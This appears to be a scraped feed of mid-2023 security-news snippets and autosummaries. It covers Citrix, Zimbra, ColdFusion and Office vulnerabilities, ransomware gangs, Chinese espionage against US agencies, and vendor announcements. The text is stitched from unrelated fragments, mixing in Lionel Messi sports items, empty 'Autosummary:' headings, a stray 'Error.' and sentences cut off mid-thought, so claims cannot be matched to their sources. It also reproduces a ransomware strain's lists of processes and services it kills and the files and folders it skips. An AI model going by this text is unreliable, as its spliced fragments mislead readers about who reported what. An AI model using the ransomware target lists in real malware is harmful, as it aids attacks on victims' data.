In a security bulletin today, Citrix says that “exploits of CVE-2023-3519 on unmitigated appliances have been observed” and strongly advises its customers to switch to an updated version that fixes the issue: NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases NetScaler ADC and NetScaler Gateway 13.0-91.13 and later releases of 13.0 NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS NetScaler ADC 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP The company notes that NetScaler ADC and NetScaler Gateway version 12.1 have reached the end-of-life stage and customers should upgrade to a newer variant of the product. "The cybercrime group FIN8 is using a revamped version of the Sardonic backdoor to deliver the BlackCat ransomware. The financially motivated group FIN8 (aka Syssphinx) was spotted using a revamped version of a backdoor tracked as Sardonic to deliver the BlackCat ransomware (aka Noberus ransomware). Sardonic is a sophisticated backdoor that supports a wide range of features that was designed […]
The post FIN8 Group spotted delivering the BlackCat Ransomware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, BlackCat ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The backdoor supports multiple commands, such as dropping arbitrary attacker’s files, exfiltrating content of arbitrary files to the remote attacker, loading a DLL plugin supplied by the remote attacker, and executing shellcode supplied by the remote attacker. "There is a significant secondary marketplace where tickets can sell for several times their original value, opening the opportunity for scammers and fraud
The post Protect yourself from ticketing scams ahead of the Premier League Summer Series USA Tour appeared first on WeLiveSecurity
"Autosummary:
Consider these tips if you want to catch one of the European matches this summer (of course, these tips also apply when snagging concert tickets or other events year-round): Purchase the ticket from the official website promoted by the teams, stadium or the official ticket website commonly used in your country.If you haven’t scored a ticket at their time of public release, then the first major difference is that tickets can become available on secondary market websites, such as SeatGeek and StubHub without any price restriction, whereas in most of Europe ticket resale is restricted and typically price locked to face-value or close to it. "The average number of scam resources created per brand across all regions and industries more than doubled year-on-year in 2022, up 162%, according to Group-IB. Additionally, the total number of scam pages detected by Group-IB in 2022 was more than three times higher than in 2021. The so-called scamdemic is spreading rapidly. Surge in scam activity Experts at Group-IB noted both an increase in the number of scams as well as the number of people … More
The post Growing scam activity linked to social media and automation appeared first on Help Net Security.
"Autosummary:
Over the past year, scammers have increasingly turned to social media to launch their campaigns, and in the APAC region, 76% of scams targeting companies in seven core sectors (financial institutions, banks, telecommunications and media, oil and gas, aviation, insurance, manufacturing) seen by Group-IB leveraged social media. In Europe, the average number of scam resources per brand in nine verticals (financial institutions, banks, video games, real estate, manufacturing, healthcare, transport and logistics, aviation) increased year-on-year by 74% in 2022. "Autosummary:
According to CERT-UA, GammaSteel is used to exfiltrate files matching a specific set of extensions – .doc, .docx, .xls, .xlsx, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z, and .mdb "The furry in which the automotive community pried, prodded, and eventually outsmarted existing functions that are software-driven is nothing short of horrifying. While it seemed like automotive cybersecurity would never outpace these modern laptop-wielding gearheads, John Heldreth, Head of Car Security Operations at Volkswagen AG, had a different idea. Instead of trying to find solutions in a siloed manner, the automotive industry should have a place to collaborate, network, and take action against the rise … More
The post Growing a 15,000 strong automotive cybersecurity group with John Heldreth appeared first on Help Net Security.
"Autosummary:
“For me this means bringing all of those different systems together into a centralized place where you can organize, identify by time or by product, by asset, and so on, so that you can understand the full picture,” said John. While it seemed like automotive cybersecurity would never outpace these modern laptop-wielding gearheads, John Heldreth, Head of Car Security Operations at Volkswagen AG, had a different idea.“What we’re trying to do, of course, is to reduce any risk to our customers,” said John.Instead of trying to find solutions in a siloed manner, the automotive industry should have a place to collaborate, network, and take action against the rise in cyber threats targeted at their vehicles. "Autosummary:
"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said. "Autosummary:
" Don Garber, commissioner of Major League Soccer, said someone of Messi"s status choosing to play in the league was a "transformational moment", and he hoped the signing would "shout to the world that this is a soccer nation". "A lot of naysayers and doubters, but Miami was able to make it happen" Inter Miami fans who could not get a ticket to the event, which was dubbed "The Unveil", waited for Messi after the show to try to catch a glimpse of the Argentina legend The arrival of Messi in the US has been met with feverish anticipation by the fans of Inter Miami, who only started playing in the Eastern Conference of the MLS in 2020. In a brief address in Spanish, Messi, 36, thanked supporters and said he had the "same desire" he always has. "Autosummary:
"A critical cross site scripting (XSS) vulnerability (CVE-2023-34192) in popular open source email collaboration suite Zimbra is being exploited by attackers. About the vulnerability (CVE-2023-34192) CVE-2023-34192 could allow a remote authenticated threat actor to execute arbitrary code through a crafted script to the /h/autoSaveDraft function. It affects Zimbra Collaboration Suite (ZCS) v.8.8.15. The company has provided admins with instruction on how to apply the fix manually, by editing a single data file. “This vulnerability has … More
The post Critical XSS vulnerability in Zimbra exploited in the wild (CVE-2023-34192) appeared first on Help Net Security.
"Autosummary:
Vulnerabilities – zero-days or not – in ZCS are often exploited by attackers, since Zimbra is widely used by a variety of organizations, including government agencies, universities, companies, etc. "Autosummary:
"Cybercriminals use these tools to access compromised accounts and impersonate legitimate customers by exploiting stolen cookie files, impersonating hyper-granular device identifiers, and utilizing fraud victims" unique network settings," the cybersecurity company said. "Autosummary:
Targets include construction and engineering, business services, government, health, transportation, and retail in Europe, Asia, and the U.S. The infection chain detailed by Mandiant exhibits tactical commonalities with another Mustang Panda campaign uncovered by Check Point, which took the wraps off a strain of self-propagating malware called WispRider that spreads through compromised USB drives and potentially breach air-gapped systems. "Autosummary:
While the details of how the vulnerability is exploited are currently unknown, a recently-removed technical blog post by Project Discovery was published last week that contains a proof-of-concept exploit for CVE-2023-29300. "Autosummary:
"Autosummary:
360doctor, 360se, Culture, Defwatch, GDscan, MsDtSrvr, QBCFMonitorService, QBDBMgr, QBIDPService, QBW32, RAgui, RTVscan, agntsvc, agntsvcencsvc, agntsvcisqlplussvc, anvir, anvir64, apache, axlbridge, backup, ccleaner, ccleaner64, dbeng50, dbsnmp, encsvc, excel, far, fdhost, fdlauncher, httpd, infopath, isqlplussvc, java, kingdee, msaccess, msftesql, mspub, mydesktopqos, mydesktopservice, mysqld-nt, mysqld-opt, mysqld, ncsvc, ocautoupds, ocomm, ocssd, onedrive, onenote, oracle, outlook, powerpnt, procexp, qbupdate, sqbcoreservice, sql, sqlagent, sqlbrowser, sqlmangr, sqlserver, sqlservr, sqlwriter, steam, supervise, synctime, taskkill, tasklist, tbirdconfig, thebat, thunderbird, tomcat, tomcat6, u8, ufida, visio, wdswfsafe, winword, wordpad, wuauclt, wxServer, wxServerView, and xfssvccon It will also stop the following Windows services associated with databases, QuickBooks, security software, and virtual machine platforms. When encrypting files, the encryptor will skip all files that have the following file extensions: exe, bat, bin, cmd, com, cpl, dat, dll, drv, hta, ini, lnk, lock, log, mod, msc, msi, msp, pif, prf, rdp, scr, shs, swp, sys, theme It will also skip files in folders whose names contain the following strings: $recycle.bin, $windows.~bt, $windows.~ws, %PROGRAMFILES(x86)%, %PUBLIC%, %ProgramData%, %SYSTEMDRIVE%\\Program Files, %SYSTEMDRIVE%\\Users\\All Users, %SYSTEMDRIVE%\\Windows, %TMP%, %USERPROFILE%\\AppData, AppData, %AppData%, EFI, Intel, MSOCache, Mozilla, Program Files, ProgramData, Tor Browser, Windows, WINDOWS, boot, google, perflogs, system volume information, windows.old During encryption, Gillespie told BleepingComputer that it could be configured to use three modes: Full - the entire file is encrypted - the entire file is encrypted Partial - Only the first X megabytes are encrypted. Culserver, DefWatch, GxBlr, GxCIMgr, GxCVD, GxFWD, GxVss, QBCFMonitorService, QBIDPService, RTVscan, SavRoam, VMAuthdService, VMUSBArbService, VMnetDHCP, VMwareHostd, backup, ccEvtMgr, ccSetMgr, dbeng8, dbsrv12, memtas, mepocs, msexchange, msmdsrv, sophos, sql, sqladhlp, sqlagent, sqlbrowser, sqlservr, sqlwriter, svc$, tomcat6, veeam, vmware-converter, vmware-usbarbitator64, vss The ransomware terminates these applications to unlock files that may be opened and prevented from being encrypted. "Autosummary:
The flaw affects WooCommerce Payment plugin versions 4.8.0 and higher, with it being fixed in versions 4.8.2, 4.9.1, 5.0.4, 5.1.3, 5.2.2, 5.3.1, 5.4.1, 5.5.2, 5.6.2, and later. "Adobe is warning customers of a critical ColdFusion pre-authentication RCE bug, tracked as CVE-2023-29300, which is actively exploited. Adobe warns customers of a critical ColdFusion pre-authentication remote code execution vulnerability, tracked as CVE-2023-29300 (CVSS score 9.8), that is actively exploited in attacks in the wild. “Adobe is aware that CVE-2023-29300 has been exploited in the […]
The post Adobe warns customers of a critical ColdFusion RCE exploited in attacks appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Adobe) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Bypassing patches On July 11th, Adobe disclosed a ColdFusion authentication bypass tracked as CVE-2023-29298, discovered by Rapid7 researchers Stephen Fewer, and a pre-auth RCE vulnerability tracked as CVE-2023-29300, discovered by CrowdStrike researcher Nicolas Zilio. Unfortunately, while that vulnerability appears to be fixed, Rapid7 says that they discovered today that the fix for their CVE-2023-29298 flaw can still be bypassed, so we should expect another patch by Adobe soon, Exploited in attacks Adobe recommends that admins" lockdown" ColdFusion installations to increase security and offer better defense against attacks. "Categories: Exploits and vulnerabilities Categories: News Tags: Zimbra Tags: MalasLocker Tags: vulnerability Tags: Google Tags: actively exploited Tags: fn:escapeXml Security experts are warning Zimbra users that a vulnerability for which there is no patch is being actively exploited in the wild. |
The post Act now! In-the-wild Zimbra vulnerability needs a workaround appeared first on Malwarebytes Labs.
"Autosummary:
Mitigation The Zimbra security update suggests you apply the follow fix manually on all of your mailbox nodes: Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto Then open to edit the active file and go to line number 40 Change <input name="st" type="hidden" value="${param.st}"/> to <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/> Zimbra notes that a service restart is not required so you can do it without any downtime. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: CISO perspective on why boards don’t fully grasp cyber attack risks In this Help Net Security interview, David Christensen, CISO of PlanSource, proposes strategies to understand and acknowledge the broader organizational and strategic implications of cybersecurity risk management, strategy, and governance. How Google Cloud’s AML AI redefines the fight against money laundering In this Help Net Security interview, Anna Knizhnik, … More
The post Week in review: Malware delivery via Microsoft Teams, law firms under cyberattack, CVSS 4.0 is out appeared first on Help Net Security.
"Autosummary:
How Google Cloud’s AML AI redefines the fight against money laundering In this Help Net Security interview, Anna Knizhnik, Director, Product Management, Cloud AI, Financial Services, at Google Cloud, explains how Google Cloud’s AML AI outperforms current systems, lowers operational costs, enhances governance, and improves the customer experience by reducing false positives and minimizing compliance verification checks. "Autosummary:
Join Today Microsoft said since the discovery of the campaign on June 16, 2023, it has "identified the root cause, established durable tracking of the campaign, disrupted malicious activities, hardened the environment, notified every impacted customer, and coordinated with multiple government entities." "Autosummary:
Join Today Making matters worse, threat actors are promoting "jailbreaks" for ChatGPT, engineering specialized prompts and inputs that are designed to manipulate the tool into generating output that could involve disclosing sensitive information, producing inappropriate content, and executing harmful code. "Autosummary:
" On securing the services of a player expected to win another Ballon d"Or this year, Beckham said: "10 years ago, when I started my journey to build a new team in Miami, I said that I dreamed of bringing the greatest players in the world to this amazing city. "Autosummary:
Other organizations that have already disclosed MOVEit Transfer breaches include Zellis (and its customers BBC, Boots, Aer Lingus, and Ireland"s HSE), Ofcam, the government of Nova Scotia, the US state of Missouri, the US state of Illinois, the University of Rochester, the American Board of Internal Medicine, BORN Ontario, SOVOS "Autosummary:
The Volt Typhoon Chinese cyberespionage group used a similar tactic to build a covert proxy network out of hacked ASUS, Cisco, D-Link, Netgear, FatPipe, and Zyxel SOHO network equipment to hide their malicious activity within legitimate network traffic, according to a joint advisory published by Five Eyes cybersecurity agencies (including the FBI, NSA, and CISA) in May. "Autosummary:
In the interim, it is urging customers to apply a manual fix to eliminate the attack vector - Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto Edit this file and go to line number 40 Update the parameter value as: <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/> Before the update, the line appeared as: <input name="st" type="hidden" value="${param.st}"/> While the company did not disclose details of active exploitation, Google Threat Analysis Group (TAG) researcher Maddie Stone said it discovered the cross-site scripting (XSS) flaw being abused in the wild as part of a targeted attack. "Autosummary:
"Some data about prospective, current, and former CSU students and current and former employees maintained by the affected vendors contains personally identifiable information, which may include first name, middle initial, last name, date of birth, student or employee identification numbers, social security number, and demographic information such as gender, ethnicity, and level and area of education." "Autosummary:
"Rockwell Automation, in coordination with the U.S. government, has analyzed a novel exploit capability attributed to Advance Persistent Threat (APT) actors affecting select communication modules," the company said in a security advisory accessible only after logging in. "With this month"s Patch Tuesday update, Microsoft addressed 130 security vulnerabilities, published two advisories, and included four major CVE revisions. We also have four zero-days to manage for Windows (CVE-2023-32046, CVE-2023-32049, CVE-2023-36874 and CVE-2023-36884), bringing the Windows platform into a "patch now" schedule.
Autosummary:
Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (ASP.NET Core, .NET Windows Microsoft released eight critical updates and 95 patches rated as important to the Windows platform, covering these key components: Windows Layer-2 Bridge Network Driver (CVE-2023-35315); Windows Remote Desktop (CVE-2023-35352); Windows Routing and Remote Access Service (RRAS) (CVE-2023-35365); Windows Message Queuing (CVE-2023-32057).We also have four zero-days to manage for Windows (CVE-2023-32046, CVE-2023-32049, CVE-2023-36874 and CVE-2023-36884), bringing the Windows platform into a "patch now" schedule. Microsoft development platforms Compared to the very serious (and numerous) exploits in Office and Windows this month, there are only five updates affecting Visual Studio, ASP.NET and a minor component of Mono (the cross platform C# implementation). "Autosummary:
Gallo accessed the facility"s computer system remotely and "transmitted a command to uninstall software that was the main hub of the facility’s computer network and that protected the entire water treatment system, including water pressure, filtration, and chemical levels. "Categories: Business Tags: business Tags: ransomware Tags: crypto Tags: cryptocurrency Tags: digital Tags: payment Tags: extortion Tags: gang Tags: group Tags: big game hunting We take a look at reports that claim ransomware is making big money in 2023. |
The post Ransomware making big money through "big game hunting" appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Back in the realm of ransomware, things aren’t perhaps quite as good with some of the big hitters from our June ransomware review serving up exploits, dubious “charity donation” requests, and an increase in attacks on education.Threats to leak data, sell it online, break other parts of the business, attack related firms, or even harass employees are all tactics ransomware authors can make use of. "Security leaders are concerned about attacks that leverage malware-exfiltrated authentication data, with 53% expressing extreme concern and less than 1% admitting they weren’t concerned at all, according to SpyCloud. However, many still lack the necessary tools to investigate the security and organizational impact of these infections and effectively mitigate follow-on attacks – with 98% indicating better visibility into at-risk applications would significantly improve their security posture. The struggle for IT security teams While increased visibility … More
The post 20% of malware attacks bypass antivirus protection appeared first on Help Net Security.
"Autosummary:
With this struggle for visibility and comprehensive response, there is a clear need for security teams to implement a more robust, identity-centric Post-Infection Remediation approach to disrupt criminals before they are able to use malware-exfiltrated data to further harm the business. "Autosummary:
"Autosummary:
"Autosummary:
The victims of Sogu malware are located in the United States, France, the UK, Italy, Poland, Austria, Australia, Switzerland, China, Japan, Ukraine, Singapore, Indonesia, and the Philippines. "Autosummary:
Join Today Impacted devices include 1756-EN2T, 1756-EN2TK, 1756-EN2TXT, 1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT, 1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT, 1756-EN2F, 1756-EN2FK, 1756-EN3TR, 1756-EN3TRK, 1756-EN4TR, 1756-EN4TRK, and 1756-EN4TRXT. "Autosummary:
"In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment," the authorities said. "SonicWall fixed multiple critical vulnerabilities impacting its GMS firewall management and Analytics management and reporting engine. SonicWall addressed multiple critical vulnerabilities in its Global Management System (GMS) firewall management and Analytics network management and reporting engine. The company fixed 15 vulnerabilities that were disclosed in a Coordinated Vulnerability Disclosure (CVD) report in conjunction with NCCGroup. […]
The post SonicWall urges organizations to fix critical flaws in GMS/Analytics products appeared first on Security Affairs.
"Autosummary:
"Rockwell Automation has fixed two vulnerabilities (CVE-2023-3595, CVE-2023-3596) in the communication modules of its ControlLogix industrial programmable logic controllers (PLCs), ahead of expected (and likely) in-the-wild exploitation. “An unreleased exploit capability leveraging these vulnerabilities is associated with an unnamed APT (Advanced Persistent Threat) group,” industrial cybersecurity company Dragos has stated on Wednesday. About the vulnerabilities (CVE-2023-3595, CVE-2023-3596) CVE-2023-3595 allows attackers to manipulate firmware memory, perform remote code execution with persistence, and modify, deny, and exfiltrate … More
The post Unnamed APT eyes vulnerabilities in Rockwell Automation industrial contollers (CVE-2023-3595 CVE-2023-3596) appeared first on Help Net Security.
"Autosummary:
CIP Socket Object should be disabled, if possible, they say, and organizations should monitor for: Unexpected or out-of-specification CIP packets to CIP objects implemented in ControlLogix communications modules Unknown scanning on a network for CIP-enabled devices Unscheduled firmware updates or logic downloads Unexpected disabling of secure boot options Arbitrary writes to communication module memory or firmware Uncommon firmware file names “Knowing about an APT-owned vulnerability before exploitation is a rare opportunity for proactive defense for critical industrial sectors. "The Biden-Harris Administration’s recently released National Cybersecurity Strategy calls for two fundamental shifts in how the United States allocates roles, responsibilities, and resources in cyberspace: Ensuring that the biggest, most capable, and best-positioned entities – in the public and private sectors – assume a greater share of the burden for mitigating cyber risk Increasing incentives to favor long-term investments into cybersecurity Today, the Administration is announcing a roadmap to realize this vision. It is taking … More
The post White House publishes National Cybersecurity Strategy Implementation Plan appeared first on Help Net Security.
"Autosummary:
A complementary initiative, led by CISA, will include offering resources such as training, cybersecurity services, technical assessments, pre-attack planning, and incident response to high-risk targets of ransomware, like hospitals and schools, to make them less likely to be affected and to reduce the scale and duration of impacts if they are attacked.The Biden-Harris Administration’s recently released National Cybersecurity Strategy calls for two fundamental shifts in how the United States allocates roles, responsibilities, and resources in cyberspace: Ensuring that the biggest, most capable, and best-positioned entities – in the public and private sectors – assume a greater share of the burden for mitigating cyber risk Increasing incentives to favor long-term investments into cybersecurity Today, the Administration is announcing a roadmap to realize this vision. "Autosummary:
"While it can be challenging to distinguish legitimate PoCs from deceptive ones, adopting safe practices such as testing in isolated environments (e.g., virtual machines) can provide a layer of protection," the researchers said. "Autosummary:
"Autosummary:
The procedure needed to mitigate the vulnerability across all mailbox nodes manually requires admins to go through the following steps: Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto Edit this file and go to line number 40 Update the parameter value to <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/> Before the update, the line appeared as <input name="st" type="hidden" value="${param.st}"/> The inclusion of the escapeXml() function will now sanitize the user-inputted data by escaping special characters used in XML markup to prevent XSS flaws. "Autosummary:
Leaked BlackLotus source code on GitHub Source: BleepingComputer "The leaked source code isn"t complete and contains mainly the rootkit part and bootkit code to bypass Secure Boot," stated Binarly"s co-founder and CEO Alex Matrosov. "Autosummary:
Multiple identify services such as SMS, Email, Fingerprint Readers, Trusted Network Locations, Manager Verification, Dua, Okta, Symantec VIP, Microsoft & Google Authenticator, Google, Facebook, Twitter, Twitter, and more. Mitigating Attacks with Specops uReset Using tools like Specops uReset, which leverages multiple weighted factors to ensure that only the correct user can reset a password, provides a secure and fast method for a helpdesk to quickly take control of a bad situation. "Autosummary:
This comprises taking advantage of living-on-the-edge infrastructure to gain initial access, using living-off-the-land techniques to conduct reconnaissance, lateral movement and information theft to limit their malware footprint and evade detection, creating persistent, privileged access via group policy objects (GPO), deploying wipers, and telegraphing their acts via hacktivist personas on Telegram. "Chinese hackers have compromised the emails of an unnamed US Federal Civilian Executive Branch (FCEB) agency. In Mid-June a malicious email activity was reported by an unnamed US Federal Civilian Executive Branch (FCEB) agency. Microsoft experts who investigated the suspicious activity discovered that China-linked threat actors have targeted the agency as part of a cyberespionage […]
The post Chinese hackers compromised emails of U.S. Government agencies appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Chinese hackers) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On US CISA urges organizations to enable audit logging, enable Purview Audit (Premium) logging, ensure logs are searchable by operators, enable Microsoft 365 Unified Audit Logging (UAL), and understand the organization’s cloud baseline. "Autosummary:
Previously, this section hosted the developer"s name, email, and location, but now it will also include the company name, complete office address, website URL, and phone number. "Autosummary:
Don"t trust exploit code Uptycs suggests that researchers who downloaded and used the fake PoC perform the following steps: Remove any unauthorized ssh keys Delete the kworker file Remove the kworker path from the bashrc file Check /tmp/.iCE-unix.pid for potential threats PoCs downloaded from the internet should be tested on sandboxed/isolated environments like virtual machines and, if possible, have their code inspected before execution. "Apple re-released its Rapid Security Response updates for iOS and macOS after fixing browsing issues on certain websites caused by the first RSR. Apple has re-released its Rapid Security Response updates to address the CVE-2023-37450 flaw in iOS and macOS after fixing browsing issues on certain websites caused by the first RSR issued by the […]
The post Apple re-released Rapid Security Response to fix recently disclosed zero-day appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Rapid Security Response) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Zimbra has released updates to address a zero-day vulnerability actively exploited in attacks aimed at Zimbra Collaboration Suite (ZCS) email servers. Zimbra urges customers to manually install updates to fix a zero-day vulnerability that is actively exploited in attacks against Zimbra Collaboration Suite (ZCS) email servers. Zimbra Collaboration Suite is a comprehensive open-source messaging and […]
The post Zimbra urges customers to manually fix actively exploited zero-day reported by Google TAG appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Zimbra) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Business Get the low-down on our recent webinar From Malvertising to Ransomware. |
The post From Malvertising to Ransomware: A ThreatDown webinar recap appeared first on Malwarebytes Labs.
"Autosummary:
"Categories: Threat Intelligence Following a three-month lull of activity, Cl0p returned with a vengeance in June and beat out LockBit as the month’s most active ransomware gang. |
The post Ransomware review: July 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by country, June 2023 Known ransomware attacks by industry sector, June 2023 Cl0p"s precipitous rise to the top of the charts this month, on the other hand, can be explained by their exploitation of a zero-day in MOVEit Transfer, a widely used file transfer software. As for who was hit the hardest, around 16 percent of ransomware incidents affecting State, Local, Tribal, and Tribunal (SLTT) governments were from LockBit, says the MS-ISAC. "Categories: Business Tags: microsoft Tags: zero-day Tags: exploit Tags: CVE-2023-36884 Tags: storm-0978 Tags: email Tags: phish Tags: phishing Tags: Ukraine We take a look at reports of an exploit being deployed via booby trapped Word documents. |
The post Zero-day deploys remote code execution vulnerability via Word documents appeared first on Malwarebytes Labs.
"Autosummary:
Microsoft gives the following advice for organisations concerned with the potential threat of compromise from the most recent attacks: CVE-2023-36884 specific recommendations Customers who use Microsoft Defender for Office 365 are protected from attachments that attempt to exploit CVE-2023-36884. "Autosummary:
Error. "Categories: Business The test evaluates products against the latest techniques used by data stealers and ransomware. |
The post Malwarebytes stops 100% of Advanced Threats in latest AV-Test assessment appeared first on Malwarebytes Labs.
"Autosummary:
GET A FREE BUSINESS TRIAL Learn more about what experts and customers are saying about Malwarebytes: Malwarebytes recognized as endpoint security leader by G2 MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks Malwarebytes receives highest rankings in recent third-party tests Malwarebytes outperforms competition in latest MRG Effitas assessment "Ransomware has been a hugely profitable industry for criminal gangs for the last few years. The total amount of ransom paid since 2020 is estimated to be at least $2 billion, and this has both motivated and enabled the groups who are profiting from this activity to become more professional. These groups are emulating the legitimate tech ecosystem and seeking greater efficiencies and profits: they outsource common, complex problems; they subcontract work; and they employ … More
The post Staying ahead of the “professionals”: The service-oriented ransomware crime industry appeared first on Help Net Security.
"Autosummary:
Have a incident response plan – If you have threat intelligence, self-awareness, controls, and policies, you can devise a plan of action for your organization to follow in the event of an incident. Actions on target are often achieved by living off the land, i.e., abusing already present operating system tools and the use of common commodity post-exploitation frameworks such as Cobalt Strike, Metasploit, and Sliver. "Google Cloud’s AML AI represents an advancement in the fight against money laundering. By replacing outdated transaction monitoring systems and embracing AI technology, financial institutions can now stay ahead of evolving financial crime risks, improve operational efficiency, ensure regulatory compliance, and deliver a superior customer experience. In this Help Net Security interview, Anna Knizhnik, Director, Product Management, Cloud AI, Financial Services, at Google Cloud, explains how Google Cloud’s AML AI outperforms current systems, lowers operational … More
The post How Google Cloud’s AML AI redefines the fight against money laundering appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Anna Knizhnik, Director, Product Management, Cloud AI, Financial Services, at Google Cloud, explains how Google Cloud’s AML AI outperforms current systems, lowers operational costs, enhances governance, and improves the customer experience by reducing false positives and minimizing compliance verification checks.By replacing outdated transaction monitoring systems and embracing AI technology, financial institutions can now stay ahead of evolving financial crime risks, improve operational efficiency, ensure regulatory compliance, and deliver a superior customer experience. "The Ultimate Guide to Certified in Cybersecurity (CC) covers everything you need to know about the entry-level credential recognized by organizations worldwide. Inside, learn how CC starts you on your path to advanced cybersecurity certification and how to access free Official (ISC)² Online Self-Paced Training and one free CC exam. As cyberthreats continue to escalate worldwide, the need for security experts is at an all-time high. Yet talent is scarce. Research shows the cybersecurity workforce … More
The post Free entry-level cybersecurity training and certification exam appeared first on Help Net Security.
"Autosummary:
"Microsoft warned today that an unpatched zero-day in multiple Windows and Office products was actively exploited in the wild. Microsoft disclosed an unpatched zero-day vulnerability in multiple Windows and Office products that has been actively exploited in the wild. The issue, tracked as CVE-2023-36884, was exploited by nation-state actors and cybercriminals to gain remote code execution […]
The post Unpatched Office zero-day CVE-2023-36884 actively exploited in targeted attacks appeared first on Security Affairs.
"Autosummary:
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION Excel.exe Graph.exe MSAccess.exe MSPub.exe PowerPoint.exe Visio.exe WinProj.exe WinWord.exe Wordpad.exe Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Microsoft) "Autosummary:
According to a report by blockchain analysis firm Chainalysis, ransomware is the only cryptocurrency crime category seeing a rise this year, with all others, including hacks, scams, malware, abuse material sales, fraud shops, and darknet market revenue, recording a steep decline. "DirectDefense announced its partnership with SCADAfence to enhance industrial cybersecurity and safeguard OT Networks in the era of IIoT. The SCADAfence Platform enables critical infrastructure and manufacturing organizations with complex Operational Technology (OT) networks to embrace the benefits of the Industrial Internet of Things (IIoT) by reducing cyber risks and mitigating operational threats. With the rise of the IIoT, OT devices are becoming more interconnected, allowing for enhanced automation and remote monitoring. While these technologies … More
The post DirectDefense partners with SCADAfence to strengthen industrial cybersecurity appeared first on Help Net Security.
"Autosummary:
By leveraging advanced algorithms, machine learning, and AI, it automatically discovers assets, detects anomalies, and identifies security risks that can compromise the availability and reliability of OT networks. "CyberCatch and Proficio announced a strategic partnership to join forces to market and deliver a combined AI-enabled solution for organizations worldwide. CyberCatch’s proprietary, artificial intelligence-enabled (AI) Software-as-a-Service (SaaS) solution is designed to help organizations implement all mandated and necessary controls, detect control failures promptly, and facilitate their resolution, enabling continuous compliance and cyber risk mitigation. Proficio’s MDR services provide round-the-clock protection, enabling organizations to proactively identify and respond to potential threats in real-time. With an … More
The post CyberCatch collaborates with Proficioto to protect users against cyber threats appeared first on Help Net Security.
"Autosummary:
"Threat landscape trends demonstrate the impressive flexibility of cybercriminals as they continually seek out fresh methods of attack, including exploiting vulnerabilities, gaining unauthorized access, compromising sensitive information, and defrauding individuals, according to the H1 2023 ESET Threat Report. Microsoft: An interesting threat landscape One of the reasons for shifts in attack patterns is stricter security policies introduced by Microsoft, particularly on opening macro-enabled files. ESET telemetry data also suggests that operators of the once-notorious Emotet … More
The post Same code, different ransomware? Leaks kick-start myriad of new variants appeared first on Help Net Security.
"Autosummary:
"Sophisticated hackers have accessed email accounts of organizations and government agencies via authentication tokens they forged by using an acquired Microsoft account (MSA) consumer signing key, the company has revealed on Tuesday. “The threat actor Microsoft links to this incident is an adversary based in China that Microsoft calls Storm-0558. We assess this adversary is focused on espionage, such as gaining access to email systems for intelligence collection.” This specific hacking group primarily targets government … More
The post Chinese hackers forged authentication tokens to breach government emails appeared first on Help Net Security.
"Autosummary:
“If you have not been contacted, our investigations indicate that you have not been impacted,” the company added, and promised to share “new details and recommendations as appropriate.” "Autosummary:
"Clop"s preference for targeting larger companies (>$5 million/year revenue) and capitalizing on newer-but-disclosed vulnerabilities has been the primary driver of its success in the first half of 2023," Sophos researcher David Wallace said in a report earlier this week, calling the group a "loud, adaptable, persistent player. "Autosummary:
"This type of espionage-motivated adversary seeks to abuse credentials and gain access to data residing in sensitive systems," Charlie Bell, executive vice president of Microsoft Security, said. "Autosummary:
Ashley Liles of Fleetwood, Letchworth Garden City, Hertfordshire, was sentenced yesterday at Reading Crown Court for blackmail and unauthorised access to a computer with intent to commit other offences. "Autosummary:
The PyLoose script (Wiz) "The memory file descriptor, memfd, is a Linux feature that allows the creation of anonymous memory-backed file objects that can be used for various purposes, such as inter-process communication or temporary storage," explains Wiz in the report. "Autosummary:
"Autosummary:
"Autosummary:
